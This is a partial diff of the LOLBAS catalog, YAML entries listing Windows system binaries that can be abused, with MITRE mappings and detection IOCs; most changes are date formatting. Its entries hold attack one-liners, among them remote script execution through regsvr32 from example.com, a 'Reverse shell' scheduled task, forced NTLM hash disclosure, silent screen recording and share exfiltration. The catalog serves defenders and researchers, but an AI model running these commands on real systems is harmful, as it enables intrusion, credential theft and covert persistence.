Created: 2018-05-25
Commands:
- Command: Msconfig.exe -5
Description: Executes command embeded in crafted c:\windows\system32\mscfgtlc.xml.

View File

@ -2,7 +2,7 @@
Name: Msdt.exe
Description: Microsoft diagnostics tool
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.

View File

@ -2,7 +2,7 @@
Name: Mshta.exe
Description: Used by Windows to execute html applications. (.hta)
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: mshta.exe evilfile.hta
Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.

View File

@ -2,7 +2,7 @@
Name: Msiexec.exe
Description: Used by Windows to execute msi files
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: msiexec /quiet /i cmd.msi
Description: Installs the target .MSI file silently.

View File

@ -2,7 +2,7 @@
Name: Netsh.exe
Description: Netsh is a Windows tool used to manipulate network interface settings.
Author: 'Freddie Barr-Smith'
Created: '2019-12-24'
Created: 2019-12-24
Commands:
- Command: netsh.exe add helper C:\Users\User\file.dll
Description: Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called

View File

@ -2,7 +2,7 @@
Name: Odbcconf.exe
Description: Used in Windows for managing ODBC connections
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: odbcconf -f file.rsp
Description: Load DLL specified in target .RSP file. See the Playloads folder for an example .RSP file.

View File

@ -0,0 +1,22 @@
---
Name: OfflineScannerShell.exe
Description: Windows Defender Offline Shell
Author: 'Elliot Killick'
Created: '2021-08-16'
Commands:
- Command: OfflineScannerShell
Description: Execute mpclient.dll library in the current working directory
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
Category: Execute
Privileges: Administrator
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218/
OperatingSystem: Windows 10
Full_Path:
- Path: C:\Program Files\Windows Defender\Offline\OfflineScannerShell.exe
Detection:
- IOC: OfflineScannerShell.exe should not be run on a normal workstation
Acknowledgement:
- Person: Elliot Killick
Handle: '@elliotkillick'
---

View File

@ -0,0 +1,25 @@
---
Name: OneDriveStandaloneUpdater.exe
Description: OneDrive Standalone Updater
Author: 'Elliot Killick'
Created: '2021-08-22'
Commands:
- Command: OneDriveStandaloneUpdater
Description: Download a file from the web address specified in HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC. ODSUUpdateXMLUrlFromOC and UpdateXMLUrlFromOC must be equal to non-empty string values in that same registry key. UpdateOfficeConfigTimestamp is a UNIX epoch time which must be set to a large QWORD such as 99999999999 (in decimal) to indicate the URL cache is good. The downloaded file will be in %localappdata%\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json
Usecase: Download a file from the Internet without executing any anomalous executables with suspicious arguments
Category: Download
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/techniques/T1105/
OperatingSystem: Windows 10
Full_Path:
- Path: '%localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe'
Detection:
- IOC: HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC being set to a suspicious non-Microsoft controlled URL
- IOC: Reports of downloading from suspicious URLs in %localappdata%\OneDrive\setup\logs\StandaloneUpdate_*.log files
Resources:
- Link: https://github.com/LOLBAS-Project/LOLBAS/pull/153
Acknowledgement:
- Person: Elliot Killick
Handle: '@elliotkillick'
---

View File

@ -2,7 +2,7 @@
Name: Pcalua.exe
Description: Program Compatibility Assistant
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: pcalua.exe -a calc.exe
Description: Open the target .EXE using the Program Compatibility Assistant.

View File

@ -2,7 +2,7 @@
Name: Pcwrun.exe
Description: Program Compatibility Wizard
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: Pcwrun.exe c:\temp\beacon.exe
Description: Open the target .EXE file with the Program Compatibility Wizard.

View File

@ -2,7 +2,7 @@
Name: Pktmon.exe
Description: Capture Network Packets on the windows 10 with October 2018 Update or later.
Author: 'Derek Johnson'
Created: '2020-08-12'
Created: 2020-08-12
Commands:
- Command: pktmon.exe start --etw
Description: Will start a packet capture and store log file as PktMon.etl. Use pktmon.exe stop

View File

@ -2,7 +2,7 @@
Name: Presentationhost.exe
Description: File is used for executing Browser applications
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: Presentationhost.exe C:\temp\Evil.xbap
Description: Executes the target XAML Browser Application (XBAP) file

View File

@ -2,7 +2,7 @@
Name: Print.exe
Description: Used by Windows to send files to the printer
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe
Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt.

View File

@ -0,0 +1,32 @@
---
Name: PrintBrm.exe
Description: Printer Migration Command-Line Tool
Author: 'Elliot Killick'
Created: '2021-06-21'
Commands:
- Command: PrintBrm -b -d \\1.2.3.4\share\example_folder -f C:\Users\user\Desktop\new.zip
Description: Create a ZIP file from a folder in a remote drive
Usecase: Exfiltrate the contents of a remote folder on a UNC share into a zip file
Category: Download
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/techniques/T1105/
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: PrintBrm -r -f C:\Users\user\Desktop\data.txt:hidden.zip -d C:\Users\user\Desktop\new_folder
Description: Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder
Usecase: Decompress and extract a ZIP file stored on an alternate data stream to a new folder
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/techniques/T1096/
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path:
- Path: C:\Windows\System32\spool\tools\PrintBrm.exe
Detection:
- IOC: PrintBrm.exe should not be run on a normal workstation
Resources:
- Link: https://twitter.com/elliotkillick/status/1404117015447670800
Acknowledgement:
- Person: Elliot Killick
Handle: '@elliotkillick'
---

View File

@ -2,7 +2,7 @@
Name: Psr.exe
Description: Windows Problem Steps Recorder, used to record screen and clicks.
Author: Leon Rodenko
Created: '2020-06-27'
Created: 2020-06-27
Commands:
- Command: psr.exe /start /output D:\test.zip /sc 1 /gui 0
Description: Record a user screen without creating a GUI. You should use "psr.exe /stop" to stop recording and create output file.

View File

@ -2,7 +2,7 @@
Name: Rasautou.exe
Description: Windows Remote Access Dialer
Author: 'Tony Lambert'
Created: '2020-01-10'
Created: 2020-01-10
Commands:
- Command: rasautou -d powershell.dll -p powershell -a a -e e
Description: Loads the target .DLL specified in -d and executes the export specified in -p. Options removed in Windows 10.

View File

@ -2,7 +2,7 @@
Name: Reg.exe
Description: Used to manipulate the registry
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
Description: Export the target Registry key and save it to the specified .REG file within an Alternate data stream.

View File

@ -2,7 +2,7 @@
Name: Regasm.exe
Description: Part of .NET
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: regasm.exe AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function.

View File

@ -2,7 +2,7 @@
Name: Regedit.exe
Description: Used by Windows to manipulate registry
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
Description: Export the target Registry key to the specified .REG file.

View File

@ -2,7 +2,7 @@
Name: Regini.exe
Description: Used to manipulate the registry
Author: 'Oddvar Moe'
Created: '2020-07-03'
Created: 2020-07-03
Commands:
- Command: regini.exe newfile.txt:hidden.ini
Description: Write registry keys from data inside the Alternate data stream.

View File

@ -2,7 +2,7 @@
Name: Register-cimprovider.exe
Description: Used to register new wmi providers
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: Register-cimprovider -path "C:\folder\evil.dll"
Description: Load the target .DLL.

View File

@ -2,7 +2,7 @@
Name: Regsvcs.exe
Description: Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: regsvcs.exe AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function.

View File

@ -2,7 +2,7 @@
Name: Regsvr32.exe
Description: Used by Windows to register dlls
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
Description: Execute the specified remote .SCT script with scrobj.dll.

View File

@ -2,7 +2,7 @@
Name: Replace.exe
Description: Used to replace file with another file
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: replace.exe C:\Source\File.cab C:\Destination /A
Description: Copy file.cab to destination

View File

@ -2,7 +2,7 @@
Name: Rpcping.exe
Description: Used to verify rpc connection
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM
Description: Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.

View File

@ -2,7 +2,7 @@
Name: Rundll32.exe
Description: Used by Windows to execute dll files
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: rundll32.exe AllTheThingsx64,EntryPoint
Description: AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute.

View File

@ -2,7 +2,7 @@
Name: Runonce.exe
Description:
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: Runonce.exe /AlternateShellStartup
Description: Executes a Run Once Task that has been configured in the registry

View File

@ -2,7 +2,7 @@
Name: Runscripthelper.exe
Description:
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test
Description: Execute the PowerShell script named test.txt

View File

@ -2,7 +2,7 @@
Name: Sc.exe
Description: Used by Windows to manage services
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice
Description: Creates a new service and executes the file stored in the ADS.

View File

@ -2,7 +2,7 @@
Name: Schtasks.exe
Description: Schedule periodic tasks
Author: 'Oddvar Moe'
Created: '2018-05-25'
Created: 2018-05-25
Commands:
- Command: schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr c:\some\directory\revshell.exe
Description: Create a recurring task to execute every minute.

Some files were not shown because too many files have changed in this diff Show More